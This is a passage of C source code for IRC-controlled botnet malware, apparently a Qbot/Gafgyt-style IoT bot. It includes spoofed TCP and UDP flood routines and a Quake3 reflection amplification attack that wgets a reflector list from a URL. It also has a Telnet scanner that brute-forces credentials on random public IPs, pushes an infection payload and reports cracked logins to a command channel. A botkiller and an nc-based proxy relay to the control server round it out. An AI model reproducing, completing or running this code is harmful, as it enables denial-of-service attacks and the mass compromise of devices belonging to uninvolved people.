  1613. pseudo_header.dest_address = send_tcp.ip.daddr;
  1614. pseudo_header.placeholder = 0;
  1615. pseudo_header.protocol = IPPROTO_TCP;
  1616. pseudo_header.tcp_length = htons(20+psize);
  1617. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  1618. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  1619. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  1620. sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  1621. if (a >= 50) {
  1622. if (time(NULL) >= start+secs) exit(0);
  1623. a=0;
  1624. }
  1625. a++;
  1626. }
  1627. close(get);
  1628. exit(0);
  1629. }
  1630.  
  1631. void unknown(int sock, char *sender, int argc, char **argv) {
  1632. int flag=1,fd,i;
  1633. unsigned long secs;
  1634. char *buf=(char*)malloc(9216);
  1635. struct hostent *hp;
  1636. struct sockaddr_in in;
  1637. time_t start=time(NULL);
  1638. if (mfork(sender) != 0) return;
  1639. if (argc < 2) {
  1640. Send(sock, "NOTICE %s :UNKNOWN <target> <secs>\n", sender);
  1641. exit(1);
  1642. }
  1643. secs=atol(argv[2]);
  1644. memset((void*)&in,0,sizeof(struct sockaddr_in));
  1645. in.sin_addr.s_addr=host2ip(sender,argv[1]);
  1646. in.sin_family = AF_INET;
  1647. Send(sock, "NOTICE %s :Unknowning %s.\n", sender,argv[1]);
  1648. while(1) {
  1649. in.sin_port = rand();
  1650. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
  1651. else {
  1652. flag=1;
  1653. ioctl(fd,FIONBIO,&flag);
  1654. sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
  1655. close(fd);
  1656. }
  1657. if (i >= 50) {
  1658. if (time(NULL) >= start+secs) break;
  1659. i=0;
  1660. }
  1661. i++;
  1662. }
  1663. close(fd);
  1664. exit(0);
  1665. }
  1666. static void printchar(unsigned char **str, int c) {
  1667. if (str) {
  1668. **str = c;
  1669. ++(*str);
  1670. }
  1671. else (void)write(1, &c, 1);
  1672. }
  1673. static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
  1674. register int pc = 0, padchar = ' ';
  1675. if (width > 0) {
  1676. register int len = 0;
  1677. register const unsigned char *ptr;
  1678. for (ptr = string; *ptr; ++ptr) ++len;
  1679. if (len >= width) width = 0;
  1680. else width -= len;
  1681. if (pad & PAD_ZERO) padchar = '0';
  1682. }
  1683. if (!(pad & PAD_RIGHT)) {
  1684. for ( ; width > 0; --width) {
  1685. printchar (out, padchar);
  1686. ++pc;
  1687. }
  1688. }
  1689. for ( ; *string ; ++string) {
  1690. printchar (out, *string);
  1691. ++pc;
  1692. }
  1693. for ( ; width > 0; --width) {
  1694. printchar (out, padchar);
  1695. ++pc;
  1696. }
  1697. return pc;
  1698. }
  1699. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
  1700. unsigned char print_buf[PRINT_BUF_LEN];
  1701. register unsigned char *s;
  1702. register int t, neg = 0, pc = 0;
  1703. register unsigned int u = i;
  1704. if (i == 0) {
  1705. print_buf[0] = '0';
  1706. print_buf[1] = '\0';
  1707. return prints (out, print_buf, width, pad);
  1708. }
  1709. if (sg && b == 10 && i < 0) {
  1710. neg = 1;
  1711. u = -i;
  1712. }
  1713.  
  1714. s = print_buf + PRINT_BUF_LEN-1;
  1715. *s = '\0';
  1716. while (u) {
  1717. t = u % b;
  1718. if( t >= 10 )
  1719. t += letbase - '0' - 10;
  1720. *--s = t + '0';
  1721. u /= b;
  1722. }
  1723. if (neg) {
  1724. if( width && (pad & PAD_ZERO) ) {
  1725. printchar (out, '-');
  1726. ++pc;
  1727. --width;
  1728. }
  1729. else {
  1730. *--s = '-';
  1731. }
  1732. }
  1733.  
  1734. return pc + prints (out, s, width, pad);
  1735. }
  1736. static int print(unsigned char **out, const unsigned char *format, va_list args ) {
  1737. register int width, pad;
  1738. register int pc = 0;
  1739. unsigned char scr[2];
  1740. for (; *format != 0; ++format) {
  1741. if (*format == '%') {
  1742. ++format;
  1743. width = pad = 0;
  1744. if (*format == '\0') break;
  1745. if (*format == '%') goto out;
  1746. if (*format == '-') {
  1747. ++format;
  1748. pad = PAD_RIGHT;
  1749. }
  1750. while (*format == '0') {
  1751. ++format;
  1752. pad |= PAD_ZERO;
  1753. }
  1754. for ( ; *format >= '0' && *format <= '9'; ++format) {
  1755. width *= 10;
  1756. width += *format - '0';
  1757. }
  1758. if( *format == 's' ) {
  1759. register char *s = (char *)va_arg( args, int );
  1760. pc += prints (out, s?s:"(null)", width, pad);
  1761. continue;
  1762. }
  1763. if( *format == 'd' ) {
  1764. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  1765. continue;
  1766. }
  1767. if( *format == 'x' ) {
  1768. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  1769. continue;
  1770. }
  1771. if( *format == 'X' ) {
  1772. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  1773. continue;
  1774. }
  1775. if( *format == 'u' ) {
  1776. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  1777. continue;
  1778. }
  1779. if( *format == 'c' ) {
  1780. scr[0] = (unsigned char)va_arg( args, int );
  1781. scr[1] = '\0';
  1782. pc += prints (out, scr, width, pad);
  1783. continue;
  1784. }
  1785. }
  1786. else {
  1787. out:
  1788. printchar (out, *format);
  1789. ++pc;
  1790. }
  1791. }
  1792. if (out) **out = '\0';
  1793. va_end( args );
  1794. return pc;
  1795. }
  1796.  
  1797. int szprintf(unsigned char *out, const unsigned char *format, ...) {
  1798. va_list args;
  1799. va_start( args, format );
  1800. return print( &out, format, args );
  1801. }
  1802.  
  1803. in_addr_t getRandomPublicIP() {
  1804. static uint8_t ipState[4] = {0};
  1805. ipState[0] = rand() % 223;
  1806. ipState[1] = rand() % 255;
  1807. ipState[2] = rand() % 255;
  1808. ipState[3] = rand() % 255;
  1809. while(
  1810. (ipState[0] == 0) ||
  1811. (ipState[0] == 10) ||
  1812. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
  1813. (ipState[0] == 127) ||
  1814. (ipState[0] == 169 && ipState[1] == 254) ||
  1815. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
  1816. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
  1817. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
  1818. (ipState[0] == 192 && ipState[1] == 168) ||
  1819. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
  1820. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
  1821. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
  1822. (ipState[0] >= 224)
  1823. )
  1824. {
  1825. ipState[0] = rand() % 223;
  1826. ipState[1] = rand() % 255;
  1827. ipState[2] = rand() % 255;
  1828. ipState[3] = rand() % 255;
  1829. }
  1830. char ip[16] = {0};
  1831. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1832. return inet_addr(ip);
  1833. }
  1834.  
  1835. int negotiate(int sock, unsigned char *buf, int len) {
  1836. unsigned char c;
  1837. switch (buf[1]) {
  1838. case CMD_IAC: return 0;
  1839. case CMD_WILL:
  1840. case CMD_WONT:
  1841. case CMD_DO:
  1842. case CMD_DONT:
  1843. c = CMD_IAC;
  1844. send(sock, &c, 1, MSG_NOSIGNAL);
  1845. if (CMD_WONT == buf[1]) c = CMD_DONT;
  1846. else if (CMD_DONT == buf[1]) c = CMD_WONT;
  1847. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
  1848. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
  1849. send(sock, &c, 1, MSG_NOSIGNAL);
  1850. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  1851. break;
  1852. default:
  1853. break;
  1854. }
  1855.  
  1856. return 0;
  1857. }
  1858.  
  1859. int contains_string(char* buffer, char** strings) {
  1860. int num_strings = 0, i = 0;
  1861. for(num_strings = 0; strings[++num_strings] != 0; );
  1862. for(i = 0; i < num_strings; i++) {
  1863. if(strcasestr(buffer, strings[i])) {
  1864. return 1;
  1865. }
  1866. }
  1867. return 0;
  1868. }
  1869. int contains_success(char* buffer) {
  1870. return contains_string(buffer, successes);
  1871. }
  1872. int contains_fail(char* buffer) {
  1873. return contains_string(buffer, fails);
  1874. }
  1875. int contains_response(char* buffer) {
  1876. return contains_success(buffer) || contains_fail(buffer);
  1877. }
  1878. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
  1879. fd_set read_set;
  1880. struct timeval tv;
  1881. tv.tv_sec = 0;
  1882. tv.tv_usec = timeout_usec;
  1883. FD_ZERO(&read_set);
  1884. FD_SET(fd, &read_set);
  1885. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
  1886. return 0;
  1887. return recv(fd, buffer, buf_size, 0);
  1888. }
  1889. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
  1890. int num_bytes, i;
  1891. memset(buffer, 0, buf_size);
  1892. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
  1893. if(buffer[0] == 0xFF) {
  1894. negotiate(fd, buffer, 3);
  1895. }
  1896.  
  1897. if(contains_string(buffer, strings)) {
  1898. return 1;
  1899. }
  1900.  
  1901. return 0;
  1902. }
  1903. const char* get_telstate_host(struct telstate_t* telstate) { // get host
  1904. struct in_addr in_addr_ip;
  1905. in_addr_ip.s_addr = telstate->ip;
  1906. return inet_ntoa(in_addr_ip);
  1907. }
  1908. void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
  1909. if(new_state == 0) {
  1910. close(telstate->fd);
  1911. }
  1912. telstate->tTimeout = 0;
  1913. telstate->state = new_state;
  1914. memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
  1915. }
  1916. void reset_telstate(struct telstate_t* telstate) { // reset
  1917. advance_telstate(telstate, 0);
  1918. telstate->complete = 1;
  1919. }
  1920.  
  1921. void TelnetScanner(int wait_usec, int maxfds, int sock) {
  1922. int max = getdtablesize() - 100, i, res, num_tmps, j;
  1923.  
  1924. char buf[128], cur_dir;
  1925. if (max > maxfds)
  1926. max = maxfds;
  1927. fd_set fdset;
  1928. struct timeval tv;
  1929. socklen_t lon;
  1930. int valopt;
  1931.  
  1932. char line[256];
  1933. char* buffer;
  1934. struct sockaddr_in dest_addr;
  1935. dest_addr.sin_family = AF_INET;
  1936. dest_addr.sin_port = htons(23);
  1937. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1938.  
  1939. buffer = malloc(SOCKBUF_SIZE + 1);
  1940. memset(buffer, 0, SOCKBUF_SIZE + 1);
  1941.  
  1942. struct telstate_t fds[max];
  1943.  
  1944. memset(fds, 0, max * (sizeof(int) + 1));
  1945. for(i = 0; i < max; i++)
  1946. {
  1947. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1948. fds[i].complete = 1;
  1949. fds[i].sockbuf = buffer;
  1950. }
  1951. while(1) {
  1952. for(i = 0; i < max; i++) {
  1953. if(fds[i].tTimeout == 0) {
  1954. fds[i].tTimeout = time(NULL);
  1955. }
  1956. switch(fds[i].state) {
  1957. case 0:
  1958. {
  1959. if(fds[i].complete == 1)
  1960. {
  1961. char *tmp = fds[i].sockbuf;
  1962. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1963. fds[i].sockbuf = tmp;
  1964.  
  1965. fds[i].ip = getRandomPublicIP();
  1966. }
  1967. else if(fds[i].complete == 0)
  1968. {
  1969. fds[i].usernameInd++;
  1970. fds[i].passwordInd++;
  1971.  
  1972. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
  1973. {
  1974. fds[i].complete = 1;
  1975. continue;
  1976. }
  1977. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
  1978. {
  1979. fds[i].complete = 1;
  1980. continue;
  1981. }
  1982. }
  1983.  
  1984. dest_addr.sin_family = AF_INET;
  1985. dest_addr.sin_port = htons(23);
  1986. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1987. dest_addr.sin_addr.s_addr = fds[i].ip;
  1988.  
  1989. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1990.  
  1991. if(fds[i].fd == -1) continue;
  1992. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1993. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  1994. {
  1995. reset_telstate(&fds[i]);
  1996. }
  1997. else
  1998. {
  1999. advance_telstate(&fds[i], 1);
  2000. }
  2001. }
  2002. break;
  2003.  
  2004. case 1:
  2005. {
  2006. FD_ZERO(&fdset);
  2007. FD_SET(fds[i].fd, &fdset);
  2008. tv.tv_sec = 0;
  2009. tv.tv_usec = wait_usec;
  2010. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  2011.  
  2012. if(res == 1) {
  2013. fds[i].tTimeout = 0;
  2014. lon = sizeof(int);
  2015. valopt = 0;
  2016. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2017. if(valopt)
  2018. {
  2019. reset_telstate(&fds[i]);
  2020. }
  2021. else
  2022. {
  2023. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  2024. advance_telstate(&fds[i], 2);
  2025. }
  2026. continue;
  2027. }
  2028. else if(res == -1)
  2029. {
  2030. reset_telstate(&fds[i]);
  2031. continue;
  2032. }
  2033. if(fds[i].tTimeout + 7 < time(NULL))
  2034. {
  2035. reset_telstate(&fds[i]);
  2036. }
  2037. }
  2038. break;
  2039. case 2:
  2040. {
  2041. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  2042. {
  2043. fds[i].tTimeout = time(NULL);
  2044. if(contains_fail(fds[i].sockbuf))
  2045. {
  2046. advance_telstate(&fds[i], 0);
  2047. }
  2048. else
  2049. {
  2050. advance_telstate(&fds[i], 3);
  2051. }
  2052. continue;
  2053. }
  2054. if(fds[i].tTimeout + 7 < time(NULL))
  2055. {
  2056. reset_telstate(&fds[i]);
  2057. }
  2058. }
  2059. break;
  2060. case 3:
  2061. {
  2062. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  2063. {
  2064. reset_telstate(&fds[i]);
  2065. continue;
  2066. }
  2067. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  2068. {
  2069. reset_telstate(&fds[i]);
  2070. continue;
  2071. }
  2072. advance_telstate(&fds[i], 4);
  2073. }
  2074. break;
  2075. case 4:
  2076. {
  2077. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  2078. {
  2079. fds[i].tTimeout = time(NULL);
  2080. if(contains_fail(fds[i].sockbuf))
  2081. {
  2082. advance_telstate(&fds[i], 0);
  2083. }
  2084. else
  2085. {
  2086. advance_telstate(&fds[i], 5);
  2087. }
  2088. continue;
  2089. }
  2090. if(fds[i].tTimeout + 7 < time(NULL))
  2091. {
  2092. reset_telstate(&fds[i]);
  2093. }
  2094. }
  2095. break;
  2096. case 5:
  2097. {
  2098. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  2099. {
  2100. reset_telstate(&fds[i]);
  2101. continue;
  2102. }
  2103. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  2104. {
  2105. reset_telstate(&fds[i]);
  2106. continue;
  2107. }
  2108. advance_telstate(&fds[i], 6);
  2109. }
  2110. break;
  2111. case 6:
  2112. {
  2113. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
  2114. {
  2115. fds[i].tTimeout = time(NULL);
  2116.  
  2117. if(contains_fail(fds[i].sockbuf))
  2118. {
  2119. advance_telstate(&fds[i], 0);
  2120. }
  2121. else if(contains_success(fds[i].sockbuf))
  2122. {
  2123. if(fds[i].complete == 2)
  2124. {
  2125. advance_telstate(&fds[i], 7);
  2126. }
  2127. else
  2128. {
  2129. Send(sock, "PRIVMSG %s :[TELNET] [+] LOGIN CRACKED ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2130. advance_telstate(&fds[i], 7);
  2131. }
  2132. }
  2133. else
  2134. {
  2135. reset_telstate(&fds[i]);
  2136. }
  2137. continue;
  2138. }
  2139. if(fds[i].tTimeout + 7 < time(NULL))
  2140. {
  2141. reset_telstate(&fds[i]);
  2142. }
  2143. }
  2144. break;
  2145. case 7:
  2146. {
  2147. fds[i].tTimeout = time(NULL);
  2148.  
  2149. if(send(fds[i].fd, Telnet_Payload, strlen(Telnet_Payload), MSG_NOSIGNAL) < 0)
  2150. {
  2151. Send(sock, "PRIVMSG %s :[TELNET] [+] SUCCESSFUL INFECTION ---> %s:%s:%s\n", CHAN, inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2152. reset_telstate(&fds[i]);
  2153. continue;
  2154. }
  2155. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "REBIRTH"))
  2156. {
  2157.  
  2158. if(strcasestr(fds[i].sockbuf, "REBIRTH") && fds[i].complete != 3)
  2159. {
  2160. Send(sock, "PRIVMSG %s :[TELNET] [+] PAYLOAD SENT ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2161. fds[i].complete = 3;
  2162. }
  2163. }
  2164. if(fds[i].tTimeout + 45 < time(NULL))
  2165. {
  2166. if(fds[i].complete!=3)
  2167. {
  2168. Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED INFECTION ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2169. }
  2170. reset_telstate(&fds[i]);
  2171. }
  2172. break;
  2173. }
  2174. }
  2175. }
  2176. }
  2177. }
  2178.  
  2179. void startScanner(int sock) {
  2180. uint32_t parent;
  2181. parent = fork();
  2182. int ii = 0;
  2183. int forks = sysconf( _SC_NPROCESSORS_ONLN );
  2184. int fds = 999999;
  2185. if(forks == 1) fds = 500;
  2186. if(forks >= 2) fds = 1000;
  2187. if (parent > 0) {
  2188. scanPid = parent;
  2189. return;
  2190. } else if(parent == -1) return;
  2191. for (ii = 0; ii < forks; ii++) {
  2192. srand((time(NULL) ^ getpid()) + getppid());
  2193. init_rand(time(NULL) ^ getpid());
  2194. TelnetScanner(100, fds, sock);
  2195. _exit(0);
  2196. }
  2197. }
  2198.  
  2199. void botkill() {
  2200. int i;
  2201. FILE *fp;
  2202. char path[1024];
  2203. char *PID[8];
  2204. char *command[128];
  2205. for (i = 0; i < NUMITEMS(Bot_Killer_Binarys); i++) {
  2206. printf("Scanning for %s\n", Bot_Killer_Binarys[i]);
  2207. sprintf(command, "pidof -s %s", Bot_Killer_Binarys[i]);
  2208. /* Open the command for reading. */
  2209. fp = popen(command, "r");
  2210. if (fp == NULL) {
  2211. printf("Failed to run command\n" );
  2212. return;
  2213. }
  2214.  
  2215. /* Read the output a line at a time - output it. */
  2216. while (fgets(path, sizeof(path)-1, fp) != NULL) {
  2217. sprintf(PID, "%s", path);
  2218. }
  2219.  
  2220. /* close */
  2221. pclose(fp);
  2222. if(atoi(PID) > 0) {
  2223. printf("Botkilling %s PID %d\n", Bot_Killer_Binarys[i], PID);
  2224. kill(atoi(PID), 9);
  2225. } else if(1 == system(command)) {
  2226. //A process having name PROCESS is NOT running.
  2227. }
  2228. }
  2229. }
  2230.  
  2231. char *getPublicIP() {
  2232. int fd;
  2233. struct ifreq ifr;
  2234.  
  2235. fd = socket(AF_INET, SOCK_DGRAM, 0);
  2236.  
  2237. ifr.ifr_addr.sa_family = AF_INET;
  2238.  
  2239. snprintf(ifr.ifr_name, IFNAMSIZ, "eth0");
  2240.  
  2241. ioctl(fd, SIOCGIFADDR, &ifr);
  2242.  
  2243. /* and more importantly */
  2244. printf("%s\n", inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
  2245.  
  2246. close(fd);
  2247. }
  2248.  
  2249. void proxyflux(int sock, char *sender, int argc, char **argv) {
  2250. if (mfork(sender) != 0) return;
  2251. char *command[128];
  2252. Send(sock, "NOTICE %s :[PROXY] [+] Starting proxy.\n", sender);
  2253. sprintf(command, "nc -l -k -p ");
  2254. strcat(command, PROXY_PORT);
  2255. strcat(command, " -c \"nc ");
  2256. strcat(command, SERVER_ADDR);
  2257. strcat(command, " 6667\" &");
  2258. system(command);
  2259. Send(sock, "NOTICE %s :[PROXY] [+] Started proxy service on %s:%d\n", sender, getPublicIP(), PROXY_PORT);
  2260. pthread_exit(NULL);
  2261. exit(0);
  2262. }
  2263.  
  2264. struct alist
  2265. {
  2266. struct sockaddr_in data;
  2267. struct list *next;
  2268. struct list *prev;
  2269. };
  2270. struct list *head;
  2271. volatile int tehport;
  2272. volatile int limiter;
  2273. volatile unsigned int pps;
  2274. volatile unsigned int sleeptime = 100;
  2275. struct quakethread_data{ int thread_id; struct alist *list_node; struct sockaddr_in sin; };
  2276.  
  2277. void setup_ip_header(struct iphdr *iph)
  2278. {
  2279. iph->ihl = 5;
  2280. iph->version = 4;
  2281. iph->tos = 0;
  2282. iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
  2283. iph->id = htonl(54321);
  2284. iph->frag_off = 0;
  2285. iph->ttl = MAXTTL;
  2286. iph->protocol = IPPROTO_UDP;
  2287. iph->check = 0;
  2288. iph->saddr = inet_addr("192.168.3.100");
  2289. }
  2290. void setup_quake_udp_header(struct udphdr *udph)
  2291. {
  2292. udph->source = htons(5678);
  2293. udph->dest = htons(27960);
  2294. udph->check = 0;
  2295. memcpy((void *)udph + sizeof(struct udphdr), "\xff\xff\xff\xff\x67\x65\x74\x73\x74\x61\x74\x75\x73\x0a", 14);
  2296. udph->len=htons(sizeof(struct udphdr) + 14);
  2297. }
  2298. void *quakeflood(void *par1)
  2299. {
  2300. struct quakethread_data *td = (struct quakethread_data *)par1;
  2301. char datagram[MAX_PACKET_SIZE];
  2302. struct iphdr *iph = (struct iphdr *)datagram;
  2303. struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
  2304. struct sockaddr_in sin = td->sin;
  2305. struct alist *list_node = td->list_node;
  2306. int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
  2307. if(s < 0){
  2308. fprintf(stderr, "Could not open raw socket.\n");
  2309. exit(-1);
  2310. }
  2311. init_rand(time(NULL));
  2312. memset(datagram, 0, MAX_PACKET_SIZE);
  2313. setup_ip_header(iph);
  2314. setup_quake_udp_header(udph);
  2315. udph->source = htons(rand() % 65535 - 1026);
  2316. iph->saddr = sin.sin_addr.s_addr;
  2317. iph->daddr = list_node->data.sin_addr.s_addr;
  2318. iph->check = ccsum ((unsigned short *) datagram, iph->tot_len >> 1);
  2319. int tmp = 1;
  2320. const int *val = &tmp;
  2321. if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  2322. fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  2323. exit(-1);
  2324. }
  2325. init_rand(time(NULL));
  2326. register unsigned int i;
  2327. i = 0;
  2328. while(1){
  2329. sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
  2330. list_node = list_node->next;
  2331. iph->daddr = list_node->data.sin_addr.s_addr;
  2332. iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  2333. iph->check = ccsum ((unsigned short *) datagram, iph->tot_len >> 1);
  2334.  
  2335. pps++;
  2336. if(i >= limiter)
  2337. {
  2338. i = 0;
  2339. usleep(sleeptime);
  2340. }
  2341. i++;
  2342. }
  2343. }
  2344. void quake3(int sock, char *sender, int argc, char *argv[])
  2345. {
  2346. if (mfork(sender) != 0) return;
  2347. char *command[128];
  2348. if(argc < 6) {
  2349. Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);
  2350. exit(-1);
  2351. }
  2352. srand(time(NULL));
  2353. int i = 0;
  2354. head = NULL;
  2355. fprintf(stdout, "Setting up sockets...\n");
  2356. int max_len = 128;
  2357. char *buffer = (char *) malloc(max_len);
  2358. buffer = memset(buffer, 0x00, max_len);
  2359. int num_threads = atoi(argv[4]);
  2360. int maxpps = atoi(argv[5]);
  2361. limiter = 0;
  2362. pps = 0;
  2363. int multiplier = 20;
  2364. sprintf(command, "wget \"%s\" -O QUAKE3.txt", argv[3]);
  2365. system(command);
  2366. Send(sock, "NOTICE %s :QUAKE3 Amp attacking %s:%s\n", sender, argv[1], argv[2]);
  2367. FILE *list_fd = fopen("QUAKE3.txt", "r");
  2368. while (fgets(buffer, max_len, list_fd) != NULL) {
  2369. if ((buffer[strlen(buffer) - 1] == '\n') ||
  2370. (buffer[strlen(buffer) - 1] == '\r')) {
  2371. buffer[strlen(buffer) - 1] = 0x00;
  2372. if(head == NULL)
  2373. {
  2374. head = (struct alist *)malloc(sizeof(struct alist));
  2375. bzero(&head->data, sizeof(head->data));
  2376. head->data.sin_addr.s_addr=inet_addr(buffer);
  2377. head->next = head;
  2378. head->prev = head;
  2379. } else {
  2380. struct alist *new_node = (struct alist *)malloc(sizeof(struct alist));
  2381. memset(new_node, 0x00, sizeof(struct alist));
  2382. new_node->data.sin_addr.s_addr=inet_addr(buffer);
  2383. new_node->prev = head;
  2384. new_node->next = head->next;
  2385. head->next = new_node;
  2386. }
  2387. i++;
  2388. } else {
  2389. continue;
  2390. }
  2391. }
  2392. struct alist *current = head->next;
  2393. pthread_t thread[num_threads];
  2394. struct sockaddr_in sin;
  2395. sin.sin_family = AF_INET;
  2396. sin.sin_addr.s_addr = inet_addr(argv[1]);
  2397. struct quakethread_data td[num_threads];
  2398. for(i = 0;i<num_threads;i++){
  2399. td[i].thread_id = i;
  2400. td[i].sin= sin;
  2401. td[i].list_node = current;
  2402. pthread_create( &thread[i], NULL, &quakeflood, (void *) &td[i]);
  2403. }
  2404. fprintf(stdout, "Starting flood...\n");
  2405. for(i = 0;i<(atoi(argv[6])*multiplier);i++)
  2406. {
  2407. usleep((1000/multiplier)*1000);
  2408. if((pps*multiplier) > maxpps)
  2409. {
  2410. if(1 > limiter)
  2411. {
  2412. sleeptime+=100;
  2413. } else {
  2414. limiter--;
  2415. }
  2416. } else {
  2417. limiter++;
  2418. if(sleeptime > 25)
  2419. {
  2420. sleeptime-=25;
  2421. } else {
  2422. sleeptime = 0;
  2423. }
  2424. }
  2425. pps = 0;
  2426. }
  2427. }
  2428.  
  2429. int listFork() {
  2430. uint32_t parent, *newpids, i;
  2431. parent = fork();
  2432. if (parent <= 0) return parent;
  2433. numpids++;
  2434. newpids = (uint32_t*)malloc((numpids + 1) * 4);
  2435. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
  2436. newpids[numpids - 1] = parent;
  2437. free(pids);
  2438. pids = newpids;
  2439. return parent;
  2440. }
  2441.  
  2442. void SendTheSTD(unsigned char *ip, int port, int secs) {
  2443. int iSTD_Sock;
  2444. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  2445. time_t start = time(NULL);
  2446. struct sockaddr_in sin;
  2447. struct hostent *hp;
  2448. hp = gethostbyname(ip);
  2449. bzero((char*) &sin,sizeof(sin));
  2450. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  2451. sin.sin_family = hp->h_addrtype;
  2452. sin.sin_port = port;
  2453. unsigned int a = 0;
  2454. while(1){
  2455. if (a >= 50) {
  2456. send(iSTD_Sock, "std", 69, 0);
  2457. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  2458. if (time(NULL) >= start + secs) {
  2459. close(iSTD_Sock);
  2460. _exit(0);
  2461. }
  2462. a = 0;
  2463. }
  2464. a++;
  2465. }
  2466. }
  2467.  
  2468. void sendSTD(int sock, char *sender, int argc, char **argv) {
  2469. //!* STD TARGET PORT TIME
  2470. if (mfork(sender) != 0) return;
  2471. if(argc < 3) {
  2472. Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender);
  2473. exit(1);
  2474. }
  2475. unsigned char *ip = argv[1];
  2476. int port = atoi(argv[2]);
  2477. int time = atoi(argv[3]);
  2478. if(strstr(ip, ",") != NULL) {
  2479. unsigned char *hi = strtok(ip, ",");
  2480. while(hi != NULL) {
  2481. if(!listFork()) {
  2482. Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
  2483. SendTheSTD(hi, port, time);
  2484. _exit(0);
  2485. }
  2486. hi = strtok(NULL, ",");
  2487. }
  2488. } else {
  2489. if (listFork()) {
  2490. exit(1);
  2491. }
  2492. Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
  2493. SendTheSTD(ip, port, time);
  2494. _exit(0);
  2495. }
  2496. }
  2497.  
